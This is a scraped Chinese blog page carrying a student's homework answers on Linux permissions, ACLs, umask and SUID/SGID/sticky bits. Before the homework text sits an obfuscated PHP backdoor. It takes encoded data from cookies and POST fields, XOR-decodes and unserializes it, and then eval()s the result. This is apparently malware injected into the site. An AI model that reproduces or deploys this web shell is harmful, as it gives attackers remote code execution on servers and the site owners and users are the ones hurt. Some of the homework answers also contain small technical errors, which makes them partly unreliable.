$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 第五次作业 | Linux运维部落

第五次作业

1、当用户xiaoming 对/testdir  目录无执行权限时,意味着无法做哪些操作?

  由于/testdir为目录,意味着xiaoming用户对此目录至少不能用cd命令跳转进入目录内,但是可以用ls -l命令查看此目录下的文件列表详细信息


2、当用户xiaoqiang 对/testdir  目录无读权限时,意味着无法做哪些操作?

  由于/testdir为目录,意味着xiaoming用户不法使用ls命令查看此目录当中的文件列表


3、当用户wangcai  对/testdir  目录无写权限时,该目录下的只读文件file1 是否可修改和删除?

  由于/testdir为目录,意味着xiaoming用户无法在此目录下创建和删除文件,而对于文件的修改是基于用户对文件所对应权限位是否给予w写权限,跟目录对应用户权限无关,但是题中表示file1是只读文件,所以用户无法删除和修改文件本身和其内容。


4、复制/etc/fstab 文件到/var/tmp 下,设置文件所有者为wangcai 读写权限,所属组为sysadmins 组有读写权限,其他人无权限

1
2
3
cp /etc/fstab /var/tmp/fstab
chown wangcai:sysadmins /var/tmp/fstab
chmod 660 /var/tmp/fstab

 

5、误删除了用户wangcai 的家目录,请重建并恢复该用户家目录及相应的权限属性

1
2
cp -r /etc/skel /home/wangcai
chown -R wangcai: /home/wangcai


6、在/data/testdir 里创建的新文件自动属于g1 组,组g2 的成员如:alice 能对这些新文件有读写权限,组g3 的成员如tom 只能对新文件有读权限,其它用户(不属于g1,g2,g3)不能访问这个文件夹

1
2
3
4
5
6
7
8
9
10
11
mkdir /data/testdir
groupadd g1
groupadd g2
groupadd g3
chown :g1 /data/testdir
chmod g+ws /data/testdir
setfacl -m g:g2:rwx /data/testdir
setfacl -m g:g3:rwx /data/testdir
setfacl -m d:g:g2:rw- /data/testdir
setfacl -m d:g:g3:r-- /data/testdir
chmod o= /data/testdir


7、三种权限rwx对文件和目录的不同意义

文件:

    r:可获取文件的数据

    w:可修改文件的数据

    x:可将此文件运行为进程,一般情况下文件是不应该有此权限的

目录:

    r:可使用ls命令获取其下的所有文件列表,但是不能使用ls -l获取详细属性信息

    w:可修改此目录下的文件列表,即创建或删除文件

    x:可cd至此目录中,且可使用ls -l来获取所有文件的详细属性信息


8、umask和acl mask 的区别和联系

umask:文件的权限反向掩码,遮罩码

     作用为控制文件默认权限,设定umask可以决定对应类型用户新建文件时,文件对各类用户的默认权限。

文件权限=666-umask

目录权限=777-umask


ACL mask:则是在ACL访问控制列表中的group权限的值,(自定义ACL权限用户,自定义ACL权限组,拥有组group(GID)的最大权限), 而非传统的组权限

mask 只影响除所有者和other 的之外的人和组的最大权限

Mask 需要与用户的权限进行逻辑与运算后,才能变成有限的权限(Effective Permission)

用户或组的设置必须存在于mask 权限设定 范围内才会生效


umask影响用户新建文件的默认权限,mask是在ACL中替代传统group权限的值,在不修改文件传统默认权限的基础上,进一步控制除所有者与other其它用户以外的(自定义ACL权限用户,自定义ACL权限组,拥有组group(GID))的最大权限


9、三种特殊权限的应用场景和作用

SUID 只对二进制可执行程序有效,当一个二进制程序有SUID时,代表着所用用户都可以以文件所有者的身份访问此程序

SUID 设置在目录上无意义


SGID

默认情况下,用户创建文件时,其属组为此用户所属的主组,一旦某目录被设定了SGID ,则对此目录有写权限的用户在此目录中创建的文件所属的组为此目录的属组

对二进制可执行程序,当一个二进制程序有SUID时,代表着所用用户都可以以文件主组的身份访问此程序


Sticky 位

具有写权限的目录通常用户可以删除该目录中的任何文件,无论该文件的权限或拥有权

在目录设置Sticky位,只有文件的所有者或root可以删除该文件

sticky 

 设置在文件上无意义


10、设置user1,使之新建文件权限为rw——- umask 066 ~/.bashrc

1
vim /home/user1/.bashrc

 wKiom1enBEXCvgi2AAA5oCtxs7g257.jpg  


11、设置/testdir/f1的权限,使user1用户不可以读写执行,g1组可以读写

1
setfacl -m u:user1:-,g:g1:rw   /testdir/f1

12、/testdir/dir的权限,使新建文件自动具有acl权限:user1:rw,g1:—

1
2
setfacl -m u:user1:rwx /testdir/dir
setfacl -m d:u:user1:rw,d:g:g1:0 /testdir/dir


13、备份/testdir目录中所有文件的ACL,清除/testdir的所有ACL权限,并利用备份还原

1
2
3
getfacl -R /testdir > acl.txt
setfacl -b /testdir
setfacl -R --set-file=/tmp/acl.txt /testdir/dir

原创文章,作者:NameLess,如若转载,请注明出处:http://www.178linux.com/30711

(1)
上一篇 2016-08-07 22:05
下一篇 2016-08-07 22:05

相关推荐

  • 马哥教育网络班19期第十二周课程练习

    1、请描述一次完整的http请求处理过程; 一次完整的http请求处理过程如下: (1) 建立或处理连接:接收客户端的请求,建立连接,或是拒绝其请求 (2) 接收请求: 接收来自于网络的请求报文中对某资源的一次请求的过程时,web服务器也分几种模型对并发请求进行响应:             &nb…

    Linux干货 2016-08-11
  • 自制linux和编译内核

    自制linux:(1)  分区并创建文件系统  fdisk /dev/sdb分两个必要的分区  /dev/sdb1 对应/boot /dev/sdb2 对应根  /mkfs.ext4 /dev/sdb1mkfs.ext4 /dev/sdb2  挂载bootmkdir /mnt/boot 子目录必须为bootm…

    Linux干货 2017-04-02
  • keepalived+haproxy实现wordpress的动静分离及负载均衡、高可用

    实验目的:使用keepalived+haproxy实现wordpress的动静分离及负载均衡、高可用 实验要求:客户端请求的动态资源代理至动态资源web组,请求的静态代理至静态资源web组,启用统计面信息并只对特定启用统计面管理功能,启用https安全连接 系统环境:CentOS 7.3、关闭selinux和清除iptables规则,A和B主机各需要两块网卡…

    2017-05-18
  • CentOS6.8启动卡死在开机进度条

    不知道什么原因CentOS6.8开机的时候卡在进度条一直进不去。就是下面的画面 在这个画面下面也看不到什么原因,果断F5切换至有显示开机进程的界面 看到了上述的错误提示:invalid user :'root' root是无效的root这是什么鬼? 接下来重新开机,进入到救援模式 开机的时候快速按一下ESC,进入到CD启动,然后选择救援模…

    Linux干货 2016-12-08
  • LVS-nat-dr

    主程序:ipvsadm 配置文件: 规则保存工具:/usr/sbin/ipvsadm-save 规则重载工具:/usr/sbin/ipvsadm-restore 配置文件:/etc/sysconfig/ipvsadm-config ipvsadm使用: 增:      示例:ipvsadm -A -t 172.16.42.1:8…

    2017-08-08
  • 第四周小结

    这周我们主要学习了写脚本的简单语法,写了一些简单的脚本,下面就由我来简单介绍一下: 第一步使用文本编辑来创建脚本: 创建好后在里面写想要运行的脚本即可,然后按Esc—wq退出保存即可。也可以按q不保存退出;q!不保存强制退出;wq!保存强制退出。 第二步运行脚本,给予执行权限,在命令行上指定脚本的相对路径和绝对路径 对了,当在脚本里输入内容时,要Ese&#8…

    2017-08-06